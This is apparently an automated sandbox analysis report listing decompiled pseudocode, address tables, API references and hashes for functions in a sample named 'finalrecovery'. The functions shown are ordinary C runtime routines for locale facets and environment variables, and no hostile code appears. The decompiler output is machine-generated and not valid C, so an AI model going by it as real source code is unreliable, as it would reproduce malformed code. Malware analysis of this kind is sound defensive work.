				char _v120;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t40;
				signed int _t41;
				intOrPtr* _t44;
				intOrPtr _t48;
				intOrPtr _t50;
				void* _t57;
				signed int _t62;
				signed int _t63;
				void* _t64;
				intOrPtr _t66;
				intOrPtr _t73;
				signed int _t81;
				void* _t82;
				intOrPtr* _t84;
				intOrPtr* _t85;
				void* _t86;
				void* _t91;
				signed int _t94;
				void* _t102;

				_t79 = __edx;
				_t64 = _t91;
				_t94 = (_t91 - 0x00000008 & 0xfffffff8) + 4;
				_v8 =  *((intOrPtr*)(_t64 + 4));
				_t89 = _t94;
				_push(0xffffffff);
				_push(0x42cbd4);
				_push( *[fs:0x0]);
				_push(_t64);
				_t40 =  *0x43d054; // 0x8e1b5714
				_t41 = _t40 ^ _t94;
				_v32 = _t41;
				_push(_t41);
				 *[fs:0x0] =  &_v24;
				_t84 =  *((intOrPtr*)(_t64 + 8));
				_v36 = _t84;
				E0040E023( &_v44, 0);
				_v16 = 0;
				_t81 =  *0x4500b0; // 0x1
				_t44 =  *0x450d08; // 0x15cab60
				_v48 = _t44;
				if(_t81 == 0) {
					E0040E023( &_v40, _t81);
					_t102 =  *0x4500b0 - _t81; // 0x1
					if(_t102 == 0) {
						_t62 =  *0x450098; // 0x1
						_t63 = _t62 + 1;
						 *0x450098 = _t63;
						 *0x4500b0 = _t63;
					}
					E0040E07B( &_v40);
					_t81 =  *0x4500b0; // 0x1
				}
				_t66 =  *((intOrPtr*)(_t84 + 4));
				if(_t81 >=  *((intOrPtr*)(_t66 + 0xc))) {
					_t85 = 0;
					__eflags = 0;
					L8:
					if( *((char*)(_t66 + 0x14)) == 0) {
						L11:
						if(_t85 != 0) {
							L19:
							E0040E07B( &_v44);
							 *[fs:0x0] = _v24;
							_pop(_t82);
							_pop(_t86);
							return E0040EB3F(_t85, _t64, _v32 ^ _t89, _t79, _t82, _t86);
						}
						L12:
						_t48 = _v48;
						if(_t48 == 0) {
							_t85 = E0040ED4F(_t64, _t81, _t85, __eflags, 0x18);
							_v48 = _t85;
							_v16 = 1;
							_t73 =  *((intOrPtr*)(_v36 + 4));
							__eflags = _t73;
							if(_t73 == 0) {
								_t50 = 0x4399f7;
							} else {
								_t50 =  *((intOrPtr*)(_t73 + 0x18));
								__eflags = _t50;
								if(_t50 == 0) {
									_t50 = _t73 + 0x1c;
								}
							}
							E00403F10(_t50);
							 *((intOrPtr*)(_t85 + 4)) = 0;
							 *_t85 = 0x42eee4;
							E0040E5FF(_t81, _t85, __eflags,  &_v68);
							asm("movups xmm0, [eax]");
							asm("movups [esi+0x8], xmm0");
							E00403FC0( &_v120);
							_v36 = _t85;
							_v16 = 2;
							E0040E1D4(__eflags, _t85);
							_t79 =  *_t85;
							 *((intOrPtr*)( *_t85 + 4))();
							 *0x450d08 = _t85;
						} else {
							_t85 = _t48;
						}
						goto L19;
					}
					_t57 = E0040E200();
					if(_t81 >=  *((intOrPtr*)(_t57 + 0xc))) {
						goto L12;
					}
					_t85 =  *((intOrPtr*)( *((intOrPtr*)(_t57 + 8)) + _t81 * 4));
					goto L11;
				}
				_t85 =  *((intOrPtr*)( *((intOrPtr*)(_t66 + 8)) + _t81 * 4));
				if(_t85 != 0) {
					goto L19;
				}
				goto L8;
			}

0x0040c510
0x0040c511
0x0040c519
0x0040c520
0x0040c524
0x0040c526
0x0040c528
0x0040c533
0x0040c534
0x0040c538
0x0040c53d
0x0040c53f
0x0040c544
0x0040c548
0x0040c54e
0x0040c556
0x0040c559
0x0040c55e
0x0040c565
0x0040c56b
0x0040c570
0x0040c575
0x0040c57b
0x0040c580
0x0040c586
0x0040c588
0x0040c58d
0x0040c58e
0x0040c593
0x0040c593
0x0040c59b
0x0040c5a0
0x0040c5a0
0x0040c5a6
0x0040c5ac
0x0040c5be
0x0040c5be
0x0040c5c0
0x0040c5c4
0x0040c5d6
0x0040c5d8
0x0040c665
0x0040c668
0x0040c672
0x0040c67a
0x0040c67b
0x0040c68c
0x0040c68c
0x0040c5de
0x0040c5de
0x0040c5e3
0x0040c5f0
0x0040c5f5
0x0040c5f8
0x0040c5ff
0x0040c602
0x0040c604
0x0040c612
0x0040c606
0x0040c606
0x0040c609
0x0040c60b
0x0040c60d
0x0040c60d
0x0040c60b
0x0040c61b
0x0040c623
0x0040c62b
0x0040c631
0x0040c63c
0x0040c63f
0x0040c643
0x0040c648
0x0040c64c
0x0040c650
0x0040c655
0x0040c65c
0x0040c65f
0x0040c5e5
0x0040c5e5
0x0040c5e5
0x00000000
0x0040c5e3
0x0040c5c6
0x0040c5ce
0x00000000
0x00000000
0x0040c5d3
0x00000000
0x0040c5d3
0x0040c5b1
0x0040c5b6
0x00000000
0x00000000
0x00000000

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 0040C559
std::_Lockit::_Lockit.LIBCPMT ref: 0040C57B
std::_Lockit::~_Lockit.LIBCPMT ref: 0040C59B
__Getctype.LIBCPMT ref: 0040C631
std::_Facet_Register.LIBCPMT ref: 0040C650
std::_Lockit::~_Lockit.LIBCPMT ref: 0040C668

Strings

B@, xrefs: 0040C62B

Memory Dump Source

Source File: 00000002.00000002.323409231.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.323409231.0000000000452000.00000040.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_finalrecovery.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_GetctypeRegister
String ID: B@
API String ID: 1102183713-1939862501
Opcode ID: 956430f717bbb0b9acaeba20c9b6b52ab45130d629bc6ecfb1f9cf7f249c9e74
Instruction ID: 7d4eb4a2309380256e9014bde5af99e0ce1f4255be05dda2c90e3ed58e46587f
Opcode Fuzzy Hash: 956430f717bbb0b9acaeba20c9b6b52ab45130d629bc6ecfb1f9cf7f249c9e74
Instruction Fuzzy Hash: 00419A75900214DBCB20DF55D881BAAB7B4EB04B14F14467EE806BB392EB39AD05CB99

Uniqueness

Uniqueness Score: -1.00%

Function 00424B94 Relevance: 12.2, APIs: 8, Instructions: 203
COMMON

Download Yara Rule

C-Code - Quality: 87%

			E00424B94(signed int __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8) {
				signed int _v5;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v48;
				signed int _t59;
				signed int _t62;
				signed int _t64;
				signed int _t67;
				signed int _t68;
				signed int _t71;
				signed int _t72;
				signed int _t76;
				signed int* _t78;
				signed int _t84;
				signed int _t86;
				signed int _t87;
				signed int _t91;
				intOrPtr* _t98;
				signed int _t109;
				signed int _t110;
				signed int _t111;
				intOrPtr* _t120;
				signed int _t121;
				void* _t122;
				void* _t126;
				signed int _t130;
				signed int _t138;
				signed int _t139;
				signed int _t141;
				signed int _t143;
				signed int _t146;
				signed int _t149;
				signed int _t150;
				void* _t153;
				void* _t157;
				void* _t158;
				void* _t160;
				void* _t162;

				_t110 = __ebx;
				_t153 = _t157;
				_t158 = _t157 - 0x10;
				_t146 = _a4;
				_t163 = _t146;
				if(_t146 != 0) {
					_push(__ebx);
					_t141 = _t146;
					_t59 = E00412BF0(_t146, 0x3d);
					_v20 = _t59;
					__eflags = _t59;
					if(__eflags == 0) {
						L38:
						 *((intOrPtr*)(E00413571(__eflags))) = 0x16;
						goto L39;
					} else {
						__eflags = _t59 - _t146;
						if(__eflags == 0) {
							goto L38;
						} else {
							_v5 =  *((intOrPtr*)(_t59 + 1));
							L60();
							_t110 = 0;
							__eflags =  *0x450898 - _t110; // 0x15bf6c0
							if(__eflags != 0) {
								L14:
								_t64 =  *0x450898; // 0x15bf6c0
								_v12 = _t64;
								__eflags = _t64;
								if(_t64 == 0) {
									goto L39;
								} else {
									_t67 = E00424E9C(_t146, _v20 - _t146);
									_v16 = _t67;
									_t120 = _v12;
									__eflags = _t67;
									if(_t67 < 0) {
										L24:
										__eflags = _v5 - _t110;
										if(_v5 == _t110) {
											goto L40;
										} else {
											_t68 =  ~_t67;
											_v16 = _t68;
											_t30 = _t68 + 2; // 0x2
											_t139 = _t30;
											__eflags = _t139 - _t68;
											if(_t139 < _t68) {
												goto L39;
											} else {
												__eflags = _t139 - 0x3fffffff;
												if(_t139 >= 0x3fffffff) {
													goto L39;
												} else {
													_v12 = E00424EFC(_t120, _t139, 4);
													E0041E238(_t110);
													_t71 = _v12;
													_t158 = _t158 + 0x10;
													__eflags = _t71;
													if(_t71 == 0) {
														goto L39;
													} else {
														_t121 = _v16;
														_t141 = _t110;
														 *(_t71 + _t121 * 4) = _t146;
														 *(_t71 + 4 + _t121 * 4) = _t110;
														goto L29;
													}
												}
											}
										}
									} else {
										__eflags =  *_t120 - _t110;
										if( *_t120 == _t110) {
											goto L24;
										} else {
											E0041E238( *((intOrPtr*)(_t120 + _t67 * 4)));
											_t138 = _v16;
											__eflags = _v5 - _t110;
											if(_v5 != _t110) {
												_t141 = _t110;
												 *(_v12 + _t138 * 4) = _t146;
											} else {
												_t139 = _v12;
												while(1) {
													__eflags =  *((intOrPtr*)(_t139 + _t138 * 4)) - _t110;
													if( *((intOrPtr*)(_t139 + _t138 * 4)) == _t110) {
														break;
													}
													 *((intOrPtr*)(_t139 + _t138 * 4)) =  *((intOrPtr*)(_t139 + 4 + _t138 * 4));
													_t138 = _t138 + 1;
													__eflags = _t138;
												}
												_v16 = E00424EFC(_t139, _t138, 4);
												E0041E238(_t110);
												_t71 = _v16;
												_t158 = _t158 + 0x10;
												__eflags = _t71;
												if(_t71 != 0) {
													L29:
													 *0x450898 = _t71;
												}
											}
											__eflags = _a8 - _t110;
											if(_a8 == _t110) {
												goto L40;
											} else {
												_t122 = _t146 + 1;
												do {
													_t72 =  *_t146;
													_t146 = _t146 + 1;
													__eflags = _t72;
												} while (_t72 != 0);
												_v16 = _t146 - _t122 + 2;
												_t149 = E0041E1DB(_t146 - _t122 + 2, 1);
												_pop(_t124);
												__eflags = _t149;
												if(_t149 == 0) {
													L37:
													E0041E238(_t149);
													goto L40;
												} else {
													_t76 = E0041C728(_t149, _v16, _a4);
													_t160 = _t158 + 0xc;
													__eflags = _t76;
													if(__eflags != 0) {
														_push(_t110);
														_push(_t110);
														_push(_t110);
														_push(_t110);
														_push(_t110);
														E004134C4();
														asm("int3");
														_push(_t153);
														_push(_t141);
														_t143 = _v48;
														__eflags = _t143;
														if(_t143 != 0) {
															_t126 = 0;
															_t78 = _t143;
															__eflags =  *_t143;
															if( *_t143 != 0) {
																do {
																	_t78 =  &(_t78[1]);
																	_t126 = _t126 + 1;
																	__eflags =  *_t78;
																} while ( *_t78 != 0);
															}
															_t51 = _t126 + 1; // 0x2
															_t150 = E0041E1DB(_t51, 4);
															_t128 = _t149;
															__eflags = _t150;
															if(_t150 == 0) {
																L58:
																E00419BC9(_t110, _t128, _t139, _t143, _t150);
																goto L59;
															} else {
																_t130 =  *_t143;
																__eflags = _t130;
																if(_t130 == 0) {
																	L57:
																	E0041E238(0);
																	_t86 = _t150;
																	goto L45;
																} else {
																	_push(_t110);
																	_t110 = _t150 - _t143;
																	__eflags = _t110;
																	do {
																		_t52 = _t130 + 1; // 0x5
																		_t139 = _t52;
																		do {
																			_t87 =  *_t130;
																			_t130 = _t130 + 1;
																			__eflags = _t87;
																		} while (_t87 != 0);
																		_t53 = _t130 - _t139 + 1; // 0x6
																		_v12 = _t53;
																		 *(_t110 + _t143) = E0041E1DB(_t53, 1);
																		E0041E238(0);
																		_t162 = _t160 + 0xc;
																		__eflags =  *(_t110 + _t143);
																		if( *(_t110 + _t143) == 0) {
																			goto L58;
																		} else {
																			_t91 = E0041C728( *(_t110 + _t143), _v12,  *_t143);
																			_t160 = _t162 + 0xc;
																			__eflags = _t91;
																			if(_t91 != 0) {
																				L59:
																				_push(0);
																				_push(0);
																				_push(0);
																				_push(0);
																				_push(0);
																				E004134C4();
																				asm("int3");
																				_t84 =  *0x450898; // 0x15bf6c0
																				__eflags = _t84 -  *0x4508a4; // 0x15bf6c0
																				if(__eflags == 0) {
																					_push(_t84);
																					L43();
																					 *0x450898 = _t84;
																					return _t84;
																				}
																				return _t84;
																			} else {
																				goto L55;
																			}
																		}
																		goto L63;
																		L55:
																		_t143 = _t143 + 4;
																		_t130 =  *_t143;
																		__eflags = _t130;
																	} while (_t130 != 0);
																	goto L57;
																}
															}
														} else {
															_t86 = 0;
															__eflags = 0;
															L45:
															return _t86;
														}
													} else {
														asm("sbb eax, eax");
														 *(_v20 + 1 + _t149 - _a4 - 1) = _t110;
														__eflags = E0042B143(_v20 + 1 + _t149 - _a4, _t139, __eflags, _t149,  ~_v5 & _v20 + 0x00000001 + _t149 - _a4);
														if(__eflags == 0) {
															_t98 = E00413571(__eflags);
															_t111 = _t110 | 0xffffffff;
															__eflags = _t111;
															 *_t98 = 0x2a;
														}
														goto L37;
													}
												}
											}
										}
									}
								}
							} else {
								__eflags = _a8;
								if(_a8 == 0) {
									L9:
									__eflags = _v5 - _t110;
									if(_v5 != _t110) {
										 *0x450898 = E0041E1DB(1, 4);
										E0041E238(_t110);
										_t158 = _t158 + 0xc;
										__eflags =  *0x450898 - _t110; // 0x15bf6c0
										if(__eflags == 0) {
											L39:
											_t111 = _t110 | 0xffffffff;
											__eflags = _t111;
											goto L40;
										} else {
											__eflags =  *0x45089c - _t110; // 0x0
											if(__eflags != 0) {
												goto L14;
											} else {
												 *0x45089c = E0041E1DB(1, 4);
												E0041E238(_t110);
												_t158 = _t158 + 0xc;
												__eflags =  *0x45089c - _t110; // 0x0
												if(__eflags == 0) {
													goto L39;
												} else {
													goto L14;
												}
											}
										}
									} else {
										_t111 = 0;
										L40:
										E0041E238(_t141);
										_t62 = _t111;
										goto L41;
									}
								} else {
									__eflags =  *0x45089c - _t110; // 0x0
									if(__eflags == 0) {
										goto L9;
									} else {
										__eflags = L0041A7D1();
										if(__eflags == 0) {
											goto L38;
										} else {
											L60();
											goto L14;
										}
									}
								}
							}
						}
					}
				} else {
					_t109 = E00413571(_t163);
					 *_t109 = 0x16;
					_t62 = _t109 | 0xffffffff;
					L41:
					return _t62;
				}
				L63:
			}

0x00424b94
0x00424b97
0x00424b99
0x00424b9d
0x00424ba0
0x00424ba2
0x00424bb7
0x00424bbc
0x00424bbe
0x00424bc3
0x00424bc8
0x00424bca
0x00424dab
0x00424db0
0x00000000
0x00424bd0
0x00424bd0
0x00424bd2
0x00000000
0x00424bd8
0x00424bdb
0x00424bde
0x00424be3
0x00424be5
0x00424beb
0x00424c68
0x00424c68
0x00424c6d
0x00424c70
0x00424c72
0x00000000
0x00424c78
0x00424c7f
0x00424c84
0x00424c89
0x00424c8c
0x00424c8e
0x00424cdf
0x00424cdf
0x00424ce2
0x00000000
0x00424ce8
0x00424ce8
0x00424cea
0x00424ced
0x00424ced
0x00424cf0
0x00424cf2
0x00000000
0x00424cf8
0x00424cf8
0x00424cfe
0x00000000
0x00424d04
0x00424d0e
0x00424d11
0x00424d16
0x00424d19
0x00424d1c
0x00424d1e
0x00000000
0x00424d24
0x00424d24
0x00424d27
0x00424d29
0x00424d2c
0x00000000
0x00424d2c
0x00424d1e
0x00424cfe
0x00424cf2
0x00424c90
0x00424c90
0x00424c92
0x00000000
0x00424c94
0x00424c97
0x00424c9d
0x00424ca0
0x00424ca3
0x00424cd8
0x00424cda
0x00424ca5
0x00424ca5
0x00424cb2
0x00424cb2
0x00424cb5
0x00000000
0x00000000
0x00424cae
0x00424cb1
0x00424cb1
0x00424cb1
0x00424cc1
0x00424cc4
0x00424cc9
0x00424ccc
0x00424ccf
0x00424cd1
0x00424d30
0x00424d30
0x00424d30
0x00424cd1
0x00424d35
0x00424d38
0x00000000
0x00424d3a
0x00424d3a
0x00424d3d
0x00424d3d
0x00424d3f
0x00424d40
0x00424d40
0x00424d4c
0x00424d54
0x00424d57
0x00424d58
0x00424d5a
0x00424da2
0x00424da3
0x00000000
0x00424d5c
0x00424d63
0x00424d68
0x00424d6b
0x00424d6d
0x00424dc7
0x00424dc8
0x00424dc9
0x00424dca
0x00424dcb
0x00424dcc
0x00424dd1
0x00424dd4
0x00424dd8
0x00424dd9
0x00424ddc
0x00424dde
0x00424de5
0x00424de7
0x00424de9
0x00424deb
0x00424ded
0x00424ded
0x00424df0
0x00424df1
0x00424df1
0x00424ded
0x00424df7
0x00424e02
0x00424e05
0x00424e06
0x00424e08
0x00424e70
0x00424e70
0x00000000
0x00424e0a
0x00424e0a
0x00424e0c
0x00424e0e
0x00424e60
0x00424e62
0x00424e68
0x00000000
0x00424e10
0x00424e10
0x00424e13
0x00424e13
0x00424e15
0x00424e15
0x00424e15
0x00424e18
0x00424e18
0x00424e1a
0x00424e1b
0x00424e1b
0x00424e23
0x00424e27
0x00424e31
0x00424e34
0x00424e39
0x00424e3c
0x00424e40
0x00000000
0x00424e42
0x00424e4a
0x00424e4f
0x00424e52
0x00424e54
0x00424e75
0x00424e77
0x00424e78
0x00424e79
0x00424e7a
0x00424e7b
0x00424e7c
0x00424e81
0x00424e82
0x00424e87
0x00424e8d
0x00424e8f
0x00424e90
0x00424e96
0x00000000
0x00424e96
0x00424e9b
0x00000000
0x00000000
0x00000000
0x00424e54
0x00000000
0x00424e56
0x00424e56
0x00424e59
0x00424e5b
0x00424e5b
0x00000000
0x00424e5f
0x00424e0e
0x00424de0
0x00424de0
0x00424de0
0x00424de2
0x00424de4
0x00424de4
0x00424d6f
0x00424d80
0x00424d84
0x00424d90
0x00424d92
0x00424d94
0x00424d99
0x00424d99
0x00424d9c
0x00424d9c
0x00000000
0x00424d92
0x00424d6d
0x00424d5a
0x00424d38
0x00424c92
0x00424c8e
0x00424bed
0x00424bed
0x00424bf0
0x00424c0e
0x00424c0e
0x00424c11
0x00424c24
0x00424c29
0x00424c2e
0x00424c31
0x00424c37
0x00424db6
0x00424db6
0x00424db6
0x00000000
0x00424c3d
0x00424c3d
0x00424c43
0x00000000
0x00424c45
0x00424c4f
0x00424c54
0x00424c59
0x00424c5c
0x00424c62
0x00000000
0x00000000
0x00000000
0x00000000
0x00424c62
0x00424c43
0x00424c13
0x00424c13
0x00424db9
0x00424dba
0x00424dc1
0x00000000
0x00424dc3
0x00424bf2
0x00424bf2
0x00424bf8
0x00000000
0x00424bfa
0x00424bff
0x00424c01
0x00000000
0x00424c07
0x00424c07
0x00000000
0x00424c07
0x00424c01
0x00424bf8
0x00424bf0
0x00424beb
0x00424bd2
0x00424ba4
0x00424ba4
0x00424ba9
0x00424baf
0x00424dc4
0x00424dc6
0x00424dc6
0x00000000

APIs

___from_strstr_to_strchr.LIBCMT ref: 00424BBE
_free.LIBCMT ref: 00424C97
_free.LIBCMT ref: 00424CC4

Memory Dump Source

Source File: 00000002.00000002.323409231.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.323409231.0000000000452000.00000040.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_finalrecovery.jbxd

Yara matches

Similarity

API ID: _free$___from_strstr_to_strchr
String ID:
API String ID: 3409252457-0
Opcode ID: 947a8221a74da03e545ed7bcb170bddcde166022bfc161d3541224239d79bae0
Instruction ID: e9077a77b77cbaef882ac8ea15f918e71d01be059a736bb5fbde2ee2f0fcbb78
Opcode Fuzzy Hash: 947a8221a74da03e545ed7bcb170bddcde166022bfc161d3541224239d79bae0
Instruction Fuzzy Hash: 3D512C75B04321AFDB10BF6AE841AAE7BE4EF81314F91416FE91097282DA3DC941CB5D

Uniqueness

Uniqueness Score: -1.00%

Function 10008EC6 Relevance: 12.2, APIs: 8, Instructions: 203
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E10008EC6(signed int __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8) {
				signed int _v5;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v48;
				signed int _t59;
				signed int _t62;
				signed int _t64;
				signed int _t67;
				signed int _t68;
				signed int _t71;
				signed int _t72;
				signed int _t76;
				signed int* _t78;
				signed int _t84;
				signed int _t86;
				signed int _t87;
				signed int _t91;
				intOrPtr* _t98;
				signed int _t109;
				signed int _t110;
				signed int _t111;
				intOrPtr* _t120;
				signed int _t121;
				void* _t122;
				void* _t126;
				signed int _t130;
				signed int _t138;
				signed int _t139;
				signed int _t141;
				signed int _t143;
				signed int _t146;
				signed int _t149;
				signed int _t150;
				void* _t153;
				void* _t157;
				void* _t158;
				void* _t160;
				void* _t162;

				_t110 = __ebx;
				_t153 = _t157;
				_t158 = _t157 - 0x10;
				_t146 = _a4;
				_t163 = _t146;
				if(_t146 != 0) {
					_push(__ebx);
					_t141 = _t146;
					_t59 = E1000EA00(_t146, 0x3d);
					_v20 = _t59;
					__eflags = _t59;
					if(__eflags == 0) {
						L38:
						 *((intOrPtr*)(E100058B6(__eflags))) = 0x16;
						goto L39;
					} else {
						__eflags = _t59 - _t146;
						if(__eflags == 0) {
							goto L38;
						} else {
							_v5 =  *((intOrPtr*)(_t59 + 1));
							L60();
							_t110 = 0;
							__eflags =  *0x10017ea0 - _t110; // 0x15d2b10
							if(__eflags != 0) {
								L14:
								_t64 =  *0x10017ea0; // 0x15d2b10
								_v12 = _t64;
								__eflags = _t64;
								if(_t64 == 0) {
									goto L39;
								} else {
									_t67 = E100091CE(_t146, _v20 - _t146);
									_v16 = _t67;
									_t120 = _v12;
									__eflags = _t67;
									if(_t67 < 0) {
										L24:
										__eflags = _v5 - _t110;
										if(_v5 == _t110) {
											goto L40;
										} else {
											_t68 =  ~_t67;
											_v16 = _t68;
											_t30 = _t68 + 2; // 0x2
											_t139 = _t30;
											__eflags = _t139 - _t68;
											if(_t139 < _t68) {
												goto L39;
											} else {
												__eflags = _t139 - 0x3fffffff;
												if(_t139 >= 0x3fffffff) {
													goto L39;
												} else {
													_v12 = E1000922E(_t120, _t139, 4);
													E100079CC(_t110);
													_t71 = _v12;
													_t158 = _t158 + 0x10;
													__eflags = _t71;
													if(_t71 == 0) {
														goto L39;
													} else {
														_t121 = _v16;
														_t141 = _t110;
														 *(_t71 + _t121 * 4) = _t146;
														 *(_t71 + 4 + _t121 * 4) = _t110;
														goto L29;
													}
												}
											}
										}
									} else {
										__eflags =  *_t120 - _t110;
										if( *_t120 == _t110) {
											goto L24;
										} else {
											E100079CC( *((intOrPtr*)(_t120 + _t67 * 4)));
											_t138 = _v16;
											__eflags = _v5 - _t110;
											if(_v5 != _t110) {
												_t141 = _t110;
												 *(_v12 + _t138 * 4) = _t146;
											} else {
												_t139 = _v12;
												while(1) {
													__eflags =  *((intOrPtr*)(_t139 + _t138 * 4)) - _t110;
													if( *((intOrPtr*)(_t139 + _t138 * 4)) == _t110) {
														break;
													}
													 *((intOrPtr*)(_t139 + _t138 * 4)) =  *((intOrPtr*)(_t139 + 4 + _t138 * 4));
													_t138 = _t138 + 1;
													__eflags = _t138;
												}
												_v16 = E1000922E(_t139, _t138, 4);
												E100079CC(_t110);
												_t71 = _v16;
												_t158 = _t158 + 0x10;
												__eflags = _t71;
												if(_t71 != 0) {
													L29:
													 *0x10017ea0 = _t71;
												}
											}
											__eflags = _a8 - _t110;
											if(_a8 == _t110) {
												goto L40;
											} else {
												_t122 = _t146 + 1;
												do {
													_t72 =  *_t146;
													_t146 = _t146 + 1;
													__eflags = _t72;
												} while (_t72 != 0);
												_v16 = _t146 - _t122 + 2;
												_t149 = E10007A37(_t146 - _t122 + 2, 1);
												_pop(_t124);
												__eflags = _t149;
												if(_t149 == 0) {
													L37:
													E100079CC(_t149);
													goto L40;
												} else {
													_t76 = E100068FC(_t149, _v16, _a4);
													_t160 = _t158 + 0xc;
													__eflags = _t76;
													if(__eflags != 0) {
														_push(_t110);
														_push(_t110);
														_push(_t110);
														_push(_t110);
														_push(_t110);
														E10005809();
														asm("int3");
														_push(_t153);
														_push(_t141);
														_t143 = _v48;
														__eflags = _t143;
														if(_t143 != 0) {
															_t126 = 0;
															_t78 = _t143;
															__eflags =  *_t143;
															if( *_t143 != 0) {
																do {
																	_t78 =  &(_t78[1]);
																	_t126 = _t126 + 1;
																	__eflags =  *_t78;
																} while ( *_t78 != 0);
															}
															_t51 = _t126 + 1; // 0x2
															_t150 = E10007A37(_t51, 4);
															_t128 = _t149;
															__eflags = _t150;
															if(_t150 == 0) {
																L58:
																E100068B8(_t110, _t128, _t139, _t143, _t150);
																goto L59;
															} else {
																_t130 =  *_t143;
																__eflags = _t130;
																if(_t130 == 0) {
																	L57:
																	E100079CC(0);
																	_t86 = _t150;
																	goto L45;
																} else {
																	_push(_t110);
																	_t110 = _t150 - _t143;
																	__eflags = _t110;
																	do {
																		_t52 = _t130 + 1; // 0x5
																		_t139 = _t52;
																		do {
																			_t87 =  *_t130;
																			_t130 = _t130 + 1;
																			__eflags = _t87;
																		} while (_t87 != 0);
																		_t53 = _t130 - _t139 + 1; // 0x6
																		_v12 = _t53;
																		 *(_t110 + _t143) = E10007A37(_t53, 1);
																		E100079CC(0);
																		_t162 = _t160 + 0xc;
																		__eflags =  *(_t110 + _t143);
																		if( *(_t110 + _t143) == 0) {
																			goto L58;
																		} else {
																			_t91 = E100068FC( *(_t110 + _t143), _v12,  *_t143);
																			_t160 = _t162 + 0xc;
																			__eflags = _t91;
																			if(_t91 != 0) {
																				L59:
																				_push(0);
																				_push(0);
																				_push(0);
																				_push(0);
																				_push(0);
																				E10005809();
																				asm("int3");
																				_t84 =  *0x10017ea0; // 0x15d2b10
																				__eflags = _t84 -  *0x10017eac; // 0x15d2b10
																				if(__eflags == 0) {
																					_push(_t84);
																					L43();
																					 *0x10017ea0 = _t84;
																					return _t84;
																				}
																				return _t84;
																			} else {
																				goto L55;
																			}
																		}
																		goto L63;
																		L55:
																		_t143 = _t143 + 4;
																		_t130 =  *_t143;
																		__eflags = _t130;
																	} while (_t130 != 0);
																	goto L57;
																}
															}
														} else {
															_t86 = 0;
															__eflags = 0;
															L45:
															return _t86;
														}
													} else {
														asm("sbb eax, eax");
														 *(_v20 + 1 + _t149 - _a4 - 1) = _t110;
														__eflags = E1000B189(_v20 + 1 + _t149 - _a4, _t139, __eflags, _t149,  ~_v5 & _v20 + 0x00000001 + _t149 - _a4);
														if(__eflags == 0) {
															_t98 = E100058B6(__eflags);
															_t111 = _t110 | 0xffffffff;
															__eflags = _t111;
															 *_t98 = 0x2a;
														}
														goto L37;
													}
												}
											}
										}
									}
								}
							} else {
								__eflags = _a8;
								if(_a8 == 0) {
									L9:
									__eflags = _v5 - _t110;
									if(_v5 != _t110) {
										 *0x10017ea0 = E10007A37(1, 4);
										E100079CC(_t110);
										_t158 = _t158 + 0xc;
										__eflags =  *0x10017ea0 - _t110; // 0x15d2b10
										if(__eflags == 0) {
											L39:
											_t111 = _t110 | 0xffffffff;
											__eflags = _t111;
											goto L40;
										} else {
											__eflags =  *0x10017ea4 - _t110; // 0x0
											if(__eflags != 0) {
												goto L14;
											} else {
												 *0x10017ea4 = E10007A37(1, 4);
												E100079CC(_t110);
												_t158 = _t158 + 0xc;
												__eflags =  *0x10017ea4 - _t110; // 0x0
												if(__eflags == 0) {
													goto L39;
												} else {
													goto L14;
												}
											}
										}
									} else {
										_t111 = 0;
										L40:
										E100079CC(_t141);
										_t62 = _t111;
										goto L41;
									}
								} else {
									__eflags =  *0x10017ea4 - _t110; // 0x0
									if(__eflags == 0) {
										goto L9;
									} else {
										__eflags = L1000652C();
										if(__eflags == 0) {
											goto L38;
										} else {
											L60();
											goto L14;
										}
									}
								}
							}
						}
					}
				} else {
					_t109 = E100058B6(_t163);
					 *_t109 = 0x16;
					_t62 = _t109 | 0xffffffff;
					L41:
					return _t62;
				}
				L63:
			}

0x10008ec6
0x10008ec9
0x10008ecb
0x10008ecf
0x10008ed2
0x10008ed4
0x10008ee9
0x10008eee
0x10008ef0
0x10008ef5
0x10008efa
0x10008efc
0x100090dd
0x100090e2
0x00000000
0x10008f02
0x10008f02
0x10008f04
0x00000000
0x10008f0a
0x10008f0d
0x10008f10
0x10008f15
0x10008f17
0x10008f1d
0x10008f9a
0x10008f9a
0x10008f9f
0x10008fa2
0x10008fa4
0x00000000
0x10008faa
0x10008fb1
0x10008fb6
0x10008fbb
0x10008fbe
0x10008fc0
0x10009011
0x10009011
0x10009014
0x00000000
0x1000901a
0x1000901a
0x1000901c
0x1000901f
0x1000901f
0x10009022
0x10009024
0x00000000
0x1000902a
0x1000902a
0x10009030
0x00000000
0x10009036
0x10009040
0x10009043
0x10009048
0x1000904b
0x1000904e
0x10009050
0x00000000
0x10009056
0x10009056
0x10009059
0x1000905b
0x1000905e
0x00000000
0x1000905e
0x10009050
0x10009030
0x10009024
0x10008fc2
0x10008fc2
0x10008fc4
0x00000000
0x10008fc6
0x10008fc9
0x10008fcf
0x10008fd2
0x10008fd5
0x1000900a
0x1000900c
0x10008fd7
0x10008fd7
0x10008fe4
0x10008fe4
0x10008fe7
0x00000000
0x00000000
0x10008fe0
0x10008fe3
0x10008fe3
0x10008fe3
0x10008ff3
0x10008ff6
0x10008ffb
0x10008ffe
0x10009001
0x10009003
0x10009062
0x10009062
0x10009062
0x10009003
0x10009067
0x1000906a
0x00000000
0x1000906c
0x1000906c
0x1000906f
0x1000906f
0x10009071
0x10009072
0x10009072
0x1000907e
0x10009086
0x10009089
0x1000908a
0x1000908c
0x100090d4
0x100090d5
0x00000000
0x1000908e
0x10009095
0x1000909a
0x1000909d
0x1000909f
0x100090f9
0x100090fa
0x100090fb
0x100090fc
0x100090fd
0x100090fe
0x10009103
0x10009106
0x1000910a
0x1000910b
0x1000910e
0x10009110
0x10009117
0x10009119
0x1000911b
0x1000911d
0x1000911f
0x1000911f
0x10009122
0x10009123
